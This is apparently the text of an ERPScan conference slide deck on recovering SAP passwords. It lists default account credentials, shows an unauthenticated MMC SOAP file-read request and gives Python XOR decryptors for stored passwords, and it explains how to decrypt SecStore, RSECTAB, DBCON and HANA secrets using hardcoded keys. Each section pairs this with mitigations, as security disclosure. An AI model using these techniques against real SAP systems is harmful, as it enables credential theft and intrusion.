Invest in security to secure investments
All your SAP Passwords belong to us.
Dmitry Chastuchin Director, Security Consul;ng ERPScan.
About ERPScan
• The only 360-‐degree SAP Security solu;on -‐ ERPScan Security Monitoring Suite for SAP
• Leader by the number of acknowledgements from SAP ( 150+ ) • 60+ presenta=ons key security conferences worldwide • 25 Awards and nomina=ons • Research team -‐ 20 experts with experience in different areas
of security • Headquarters in Palo Alto (US) and Amsterdam (EU)
2
SAP
• The most popular business applica;on • More than 250000 customers worldwide • More than 83 % of Forbes 500 run SAP
3
SAP security
Espionage • Stealing financial informa;on • Stealing corporate secrets • Stealing supplier and customer lists • Stealing HR data
Fraud • False transac;ons • Modifica;on of master data
Sabotage • Denial of service • Modifica;on of financial reports • Access to technology network (SCADA) by trust rela;ons
4
Is it remotely exploitable?
5000+ non-‐web SAP services exposed in the world including Dispatcher, Message server, SapHostControl, etc.
5
Is it remotely exploitable?
0
1
2
3
4
5
6
7
8
9
SAP Dispatcher SAP MMC SAP Message Server SAP HostControl SAP ITS Agate SAP Message Server httpd
6
SAP MMC – overview
• MMC is installed by default on port 5<ID>13 • Used for remote management of SAP servers • Commands executed via SOAP interface • By default, SSL is not implemented • Administra;ve password transmi\ed using basic auth (Base64) • By sniffing this password, we can get full control over the server
7
SAP MMC – aSacks
• Many a\acks can be implemented without authen;ca;on • A\acks can be executed by sending SOAP requests • Mostly, it is informa;on disclosure and denial of service
• Also, OS command execu;on
8
Advanced MMC aSacks
<?xml version="1.0"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema">
<SOAP-ENV:Header> <sapsess:Session xmlns:sapsess="http://www.sap.com/webas/630/soap/features/
session/">
<enableSession>true</enableSession> </sapsess:Session> </SOAP-ENV:Header>
<SOAP-ENV:Body> <ns1:ReadLogFile xmlns:ns1="urn:SAPControl">
<filename>j2ee/cluster/server0/log/system/userinterface.log</filename> <filter/>
<language/> <maxentries>%COUNT%</maxentries>
<statecookie>EOF</statecookie> </ns1:ReadLogFile> </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
9
PWN
If an a&acker can read a file from server OS, he can get clear text passwords of SAP users and, as a result, compromise the SAP
system
10
11
Default passwords
Passwords on client side
User name Password
SAP* 06071992 PASS
DDIC 19920706
TMSADM PASSWORD $1Pawd2&
EARLYWATCH SUPPORT
SAPCPIC ADMIN
12
13
Passwords on client side
Passwords on client side
• A\ack via Ac;veX ‒ A lot of issues with RCE inside (1519966, 1327004, 1092631, …)
• A\ack via client bugs ‒ Buffer overflow in saplogon.exe (1504547)
What aler that?
SapLogon shortcuts!
Olen, lazy users store password for SAP account in shortcuts
14
Passwords on client side
[System] Name=DM0 Description=Test Sap Server Client=800 [User] Name=SAP* Language=EN Password=PW_48B7231FD1FE390C [Function] Title=myShortcut Command=se16 [Configuration] WorkDir=C:\Documents and Settings\Administrator\My Documents\SAP\SAP GUI [Options] Reuse=1
This is how a typical shortcut looks like…
File: <name>.sap
15
Passwords on client side
[Label] Key1=myShortcut [Command] Key1=- desc="Test Sap Server" -sid="DM0" -clt="800" -u="SAP*" -l="EN" -tit="myShortcut" -cmd="se16" -wd="C:\Documents and Settings\Administrator\My Documents\SAP\SAP GUI" -ok="/nse16" -pwenc="PW_48B7231FD1FE390C"
…or like that
File: sapshortcut.ini
16
Passwords on client side
pwenc="PW_48B7231FD1FE390C"
PW_48B7231FD1FE390C
48B7231FD1FE390C
I used this password: 06071992 Looks like XOR encryp;on
17
Passwords on client side
• Aler a few experiments, we found out: – Yes, this is XOR – Yes, the key is sta;c for all SAPLogon
• The key is:
788113…dc49b0
18
Passwords on client side
• …and the PY code to decrypt
key="788…"
def sxor(s1,s2):
return ''.join(chr(ord(a) ^ ord(b)) for a,b in zip(s1,s2))
enc_pass="PW_48B7231FD1FE390C"
dec_pass=sxor(enc_pass[3:].decode("hex"),key.decode("hex"))
print "Decoded password is: "+dec_pass
19
Preven=on
• Don’t use SAPGUI 6.4 (there are no patches for some vulns)
• Patch SAPGUI with the latest SP • Don’t store password in shortcuts • (HKCU\Solware\SAP\SAPShortcut\Security
EnablePassword=0) • Make sure that you do not ac;vate the storage of
passwords in SAP shortcuts • Authen;ca;on security for SAP shortcuts: h\p://help.sap.com/SAPHELP_NWPI71/helpdata/en/4d/dc9db9bc0e02cfe10000000a42189b/content.htm
20
21
Passwords from USR02, USH02, USRPWDHISTORY
USR02 password hash
• Well known password area • Hash algorithm:
– CODVN A – CODVN B (MD5-‐based) – CODVN D (MD5-‐based) – CODVN E (MD5-‐based) – CODVN F (SHA1-‐based) – CODVN G (Code versions B & F) – CODVN H (SHA-‐1-‐based) – CODVN I (Code versions B, F & H)
• Just use John the Ripper
22
Preven=on
• Use the latest algorithm • SAP Note 2467: Password rules and preven;ng incorrect logons • SAP Note 721119: Logon with (delivered) default user fails • SAP Note 735356: Special character in passwords; reac;va;on not possible • SAP Note 862989: New password rules as of SAP NetWeaver 2004s • SAP Note 874738: New password hash calcula;on procedure (code version E) • SAP Note 991968: Value list for login/password_hash_algorithm • SAP Note 1023437: Downwardly incompa;ble passwords since NW2004s • SAP Note 1237762: Protec;on against password hash a\acks • SAP Note 1300104: CUA – New password hash procedures -‐ Background informa;on • SAP Note 1458262: Recommended se|ngs for password hash algorithms • SAP Note 1484692: Protect read access to password hash value tables • SAP Note 1488159: SUIM – RSUSR003 – Incorrect results for CODVN = F
23
Passwords from RFC request
24
Passwords from RFC request
• If an a\acker catches an RFC request with logon data, he will be: – Happy because he got the login and password – Upset because the password is encrypted – Happy because the encryp;on is just a XOR (lol) – Happy because the key is sta;c
Key: 313ec…a4021 – Very happy because he got the clear text password
25
Passwords from RFC request
26
Passwords from RFC request
• …and the PY code to decrypt
key="313e…"
def sxor(s1,s2):
return ''.join(chr(ord(a) ^ ord(b)) for a,b in zip(s1,s2))
enc_pass="0108F357D03F770D"
dec_pass=sxor(enc_pass.decode("hex"),key.decode("hex"))
print "Decoded password is: "+dec_pass
27
Preven=on
• Secure RFC connec;on using SNC • SAP Security Note 1724516 • RFC and SNC: h\p://help.sap.com/saphelp_nw70ehp2/helpdata/en/72/e52c4057cb185de10000000a1550b0/content.htm
28
29
SAP Visual Admin password
SAP VisualAdmin
30
• SAP Visual Admin – a remote tool for controlling J2EE Engine • Uses the P4 protocol – SAP’s proprietary • By default, all data transmi\ed in cleartext • P4 can be configured to use SSL to prevent MitM • Passwords are transmi\ed by some sort of encryp;on • In reality, it is some sort of Base64 transforma;on with a known
key
SAP VisualAdmin data
31
Insecure password encryp=on in P4
32
/* 87 */ char mask = 43690; //aaaa hex /* 88 */ char check = 21845; //5555 hex /* 89 */ char[] result = new char[data.length + 1]; /* */ /* 91 */ for (int i = 0; i < data.length; ++i) { /* 92 */ mask = (char)(mask ^ data[i]); /* 93 */ result[i] = mask; /* */ } /* 95 */ result[data.length] = (char)(mask ^ check); /* */ /* 97 */ return result;
33
DEMO SAP Visual Admin password sniffing
Preven=on
• Secure P4 connec;on using SSL • SAP Security Note 1724516 • Using P4 protocol over a secure connec;on: h\p : / / he l p . s ap . c om/ s aphe l p_nw73ehp1 /he l pda t a / en /48/2d9ba88aef4bb9e10000000a42189b/content.htm
34
35
SAP JAVA Security Storage
SecStore
• The AS Java stores security-‐relevant informa;on encrypted in a file in the file system
• The AS Java stores the following security-‐relevant informa;on in files in the file system: – Database user SAP<SID>DB and its password – Database connec;on informa;on – Administrator user and its password
• Secure storage file is located at : \usr\sap\<SID>\SYS\global\security\data\SecStore.properties
36
SecStore
$internal/version=Ni4zFF4wMSeaseforCCMxegAfx admin/host/TTT=7KJuOPPs/+u+14jM7uy7cy7exrZuYvevkSrPxwueur2445yxgBS admin/password/TTT=7KJuOPPs/+uv+14j56vDc7M7v7dytbGbkgqDp+QD04b0Fh jdbc/pool/TTT=7KJuOPPs/+u5jM6s1cvvgQ1gzFvarxuUzEJTHTJI0VGegH admin/port/TTT=7KJuOPPs/+u+1j4vD1cv6ZTvd336rzEd7267Rwr4ZUgRTQ $internal/check=BJRrzfjeUA+bw4XCzdz16zX78ufbt $internal/mode=encrypted admin/user/TTT=7KJuOPPs/+u+14j6s14sTxXU3ONl3rL6N7yssV75eC6/5S3E
• The AS Java uses the SAP Java Cryptography Toolkit to encrypt the informa;on in the secure store using the TripleDES algorithm. The encryp;on is performed during the AS Java installa;on process
• Let’s look deeper
37
SecStore
• Algorithm is TripleDES. We heed a key for decryp;on
• The main issue is that the key file is located in the same directory as the encrypted data:
\usr\sap\<SID>\SYS\global\security\data\SecStore.key
• The key consists of two parts: – Version informa;on – Encrypted key phrase
38
SecStore
• Version informa;on. It affects the TripleDES key – If version >= 7.00.000, then the Triple DES key = key phrase + <SID>
• Encrypted key phrase – By default, it is the ini;al password which the administrator sets up during SAP system installa;on. Olen, this phase equals to the DB password or an SAP administrator account password (SAP*, DDIC, J2EE_Admin, etc.) – For encryp;ng the key phrase, XOR algorithm with sta;c key is used
43,-74…,-41,-67
• That’s why, if an a\acker only got the SecStore.key file, they can also get access into SAP, because they have the ini;al password
39
SecStore
• OK. We have the encrypted password (SecStore.properXes) • We have the decryp;on key (SecStore.key) • We can get all sensi;ve informa;on from Security Storage • As I said, data’s encrypted by the TripleDES algorithm • More precisely, the encryp;on uses the TripleDES algorithm in
CBC mode using a secret key which is derived from a password with the SHA hash algorithm – The key is the key phrase from SecStore.key + <SID> (if version >= 7.00.000) – The salt is the value 0000000000000000
40
SecStore
• We also wrote a tool which decrypts all the stuff from SAP JAVA AS Security Storage (SecStore_Cr.jar)
• Also, SAP Secure Store file can have another name (ex. JUpgrade.proper;es) and store other interes;ng data, like: – Password for SAP OS user (SIDADM) – DB password – DDIC password – etc…
41
Preven=on
• Install SAP Note 1619539 • Restrict read access to files SecStore.properXes, JUpgrade.properXes, and SecStore.key • Managing secure storage in the file system: h\p://help.sap.com/saphelp_nw70ehp2/helpdata/en/cd/14c93ec2f7df6ae10000000a114084/content.htm
42
43
Passwords from log files
Log files
• We know about many places where SAP writes logs • Administrator can define the verbosity level • A\acker can found many interes;ng things in log files:
informa;on about the system, informa;on about the users, even session informa;on
• Very interes;ng path with logs: /sapinst_instdir/
But what about passwords?
44
Log files
• Passwords in SAP log files looks like that:
dev_umconfigurator.trc
45
Log files
• Some;mes, we can find a clear text password
sapinst_dev.<n>.log
46
Log files
• Some;mes, we can find an encrypted password
47
Log files
• Guess what type of encryp;on is used? J • Right! XOR with a sta;c hardcoded key:
31…65d • As a result, we have a decryptor: key="31XXXXXXXXXXXX5d" def sxor(s1,s2): return ''.join(chr(ord(a) ^ ord(b)) for a,b in zip(s1,s2)) def prepare(val): encoco=val.split("|") rez="" for a in encoco: rez= rez + str(hex(int(a)).replace("0x","")) return rez encr=prepare(raw_input("Enter encrypted password:")) dec_pass=sxor(encr.decode("hex"),key.decode("hex")) print "Decoded password is: "+dec_pass
48
Log files
• The same story with the config file usr\sap\<SID>\config\usagetypes.properXes
49
Preven=on
• Don’t use TRACE_LEVEL = 3 • Delete traces when work is finished • Mask security-‐sensi;ve data in HTTP access log • Incremen;ng/decremen;ng the trace level: h \ p s : / / h e l p . s a p . c om / s a p h e l p _ nwp i 7 1 / h e l p d a t a / e n /46/962416a5a613e8e10000000a155369/content.htm
50
51
Passwords from SLD config file
SLD
• SLD is the central informa;on repository for your system landscape
• It contains informa;on about: – technical systems – landscapes – business systems – products – solware components in your system landscape
52
SLD password files
• Configura;on file: usr\sap\<sid>\DVEBMGS<nn>\exe\ slddest.cfg – User name with DataSupplierLD role – User password (wooot!) – Host name – Port
Encrypted by DES algorithm in the early version of SLD Sta;c default key is: 0A…71F
But if user specifies the key, then the key file is stored near the encrypted data file in slddest.cfg.key
53
SLD password files
• In the latest versions of SLD, another algorithm is used: TripleDES with hardcoded key
54
Preven=on
• Restrict read access to fileslddest.cfg and slddest.cfg.key • Configuring sldreg and transferring data to SLD: h\p://help.sap.com/saphelp_nw70/helpdata/en/42/ea5ff4b5d61bd9e10000000a11466f/content.htm
55
56
Passwords from ABAP SecStore
Password from RSECTAB
• The secure storage is a component of the SAP Web Applica;on Server ABAP
• It allows the encrypted storage of sensi;ve data that SAP applica;ons require when logging into other systems
• These SAP applica;ons use the storage to store passwords: – RFC des;na;ons – Exchange Infrastructure (XI) – LDAP system users – SAPphone – SAPconnect – CCMS (Generic Request and Message Generator)
• Table RSECTAB select rawtohex(DATA) from SAPSR3.RSECTAB
57
Password from RSECTAB
58
Password from RSECTAB
59
Password from RSECTAB
• TripleDES 3DES mode: DES-‐EDE3 • The triple DES algorithm uses the DES-‐EDE3 method where a 24
byte key is supplied. This means there are three DES opera;ons in the sequence encrypt-‐decrypt-‐encrypt with the three different keys. The first key will be bytes 1 to 8, the second key bytes 9 to 16 and the third key bytes 17 to 24
• Two rounds
60
Password from RSECTAB
• First round • Encrypt:
– char randomPrefix[2]; – char payload[109]; – char payloadLength; – char magicLocal[4]; – char magicGlobalSalted[4]; – char recordIden;fierA7Hash[16];
61
Password from RSECTAB
• Key for the first round of encryp;on base on default key: Key’def[1] = Keydef[1] ^ (Hsup[0] & 0xF0)
Key’def[6] = Keydef[6] ^ (Hsup[0] & 0x0F)
Key’def[7] = Keydef[7] ^ (Hsup[3] & 0xF0)
Key’def[10] = Keydef[10] ^ (Hsup[1] & 0xF0)
Key’def[13] = Keydef[13] ^ (Hsup[1] & 0x0F)
Key’def[16] = Keydef[16] ^ (Hsup[4] & 0x0F)
Key’def[19] = Keydef[19] ^ (Hsup[2] & 0xF0)
Key’def[20] = Keydef[20] ^ (Hsup[2] & 0x0F)
• Where Hsup is md5(sidA7[3]+insnoA7[10])
62
Password from RSECTAB
63
Password from RSECTAB
• Second round • Encrypt all data with the default key
64
Password from RSECTAB
• What about the default key? • It is encrypted via 3DES-‐EDE2, too • But the key for this encryp;on is hardcoded
65
Preven=on
• Change the default key • SAP Security Note 1902611 • Choosing your own key: h\p://help .sap.com/saphelp_nw70ehp2/helpdata/en/e0/f73d41945bdb2be10000000a1550b0/content.htm
66
67
Passwords from DBCON table
DBCON table
• SAP has a connec;on with different DBs • Administrator can manage this connec;on via the transac;on
DBCO • All DB connec;ons informa;on is stored encrypted in the table
DBCON (Descrip;on of Database Connec;ons)
68
DBCON table
• Encrypted data looks like: V01/0030ZctvSB67Wv1OuVLazse4ORik
– BASE64 + DES – hardcoded key: 59A…70E – decrypted data includes sta;c salt: BE HAPPY
69
Preven=on
• Restrict access to the table DBCON • Restrict access to the transac;on DBCO • SAP Security Notes 1638280 and 1823566
70
71
Passwords from HANA
SAP HANA
• User details (including passwords) stored in hdbuserstore • Located in the /usr/sap/hdbclient directory • About hdbuserstore:
‒ SSFS_HDB.DAT ‒ with user data ‒ with keys
72
SAP HANA
• SSFS_HDB.DAT • Signature: RSecSSFsData • Algorithm: 3DES • Default key is the same as in the ABAP Security Storage
73
SAP HANA
• SAP HANA – in memory database • But it drops some data into FS
– Backup – Savepoint
“The SAP HANA database holds the bulk of its data in memory for maximum
performance, but it sXll uses persistent disk storage to provide a fallback in case of failure. Data is automaXcally saved from memory to disk at regular
savepoints. The data belonging to a savepoint represents a consistent state of the data on disk and remains so unXl the next savepoint operaXon has
completed. Aber a power failure, the database can be restarted like any disk-‐based database and returns to its last consistent state,”
– SAP HANA Security Guide
74
SAP HANA
• “Data volume encrypXon ensures that anyone who can access the data volumes on disk using operaXng system commands cannot see the actual data. If data volumes are encrypted, all pages that reside in the data area on disk are encrypted using the AES-‐256-‐CBC algorithm.”
• “Aber data volume encrypXon has been enabled, an iniXal page key is automaXcally generated. Page keys are never readable in plain text, but are encrypted themselves using a dedicated persistence encrypXon root key.”
75
SAP HANA
“SAP HANA uses SAP NetWeaver SSFS to protect the root encrypXon keys that are used to protect all encrypXon keys used in the SAP HANA system from
unauthorized access.”
• SSFS_HDB.DAT – HDB_SERVER/PERSISTENCE/ROOTKEY – HDB_SERVER/DPAPI
• The persistence encryp;on feature does not encrypt the following data: – Database redo log files – Database backups – Database traces
76
Preven=on
• Change the encryp;on key aler installa;on • Restrict access to the key file • Restrict access to the DAT file • Security guide for HANA (p. 71) h&p://help.sap.com/hana/SAP_HANA_Security_Guide_en.pdf
• Secure storage in the file system: h&p : / / h e l p . s a p . c om/ saphe l p _nw70ehp2 /h e l p da t a / en /a0/82dd0abbde4696b98a8be133b27f3b/content.htm
77
Etc..
• ICF Password Repository – ICFSECPASSWD
• FI module passwords – FIEB_PASSWORD
• Oracle Fail Safe – Stores passwords inside the ENVIRONMENT variable (Note 1764043 p. 4)
• SAP BusinessObjects LCMuser – hardcoded SVN user – \SAP BusinessObjects Enterprise XI.0\LCM_repository\svn_repository
\conf
• SAP BusinessObjects axis2 login:password – axis2.xml
78
It is possible to protect yourself from these kinds of issues, and we are working close with SAP to keep customers secure
SAP guides
It’s all in your hands
Regular security assessments
ABAP code review
Monitoring technical security
Segrega=on of du=es
79
Conclusion
I'd like to thank SAP's Product Security Response Team for the great cooperaXon to make SAP systems more secure. Research is always ongoing, and we can't share all of it today. If you want to be the first to see new a&acks and demos, follow us at @erpscan and a&end future presentaXons.
PS: • EAS-‐SEC: Recourse which combines
– Guidelines for assessing enterprise applica;on security – Guidelines for assessing custom code – Surveys about enterprise applica;on security
80
Future work
Top Related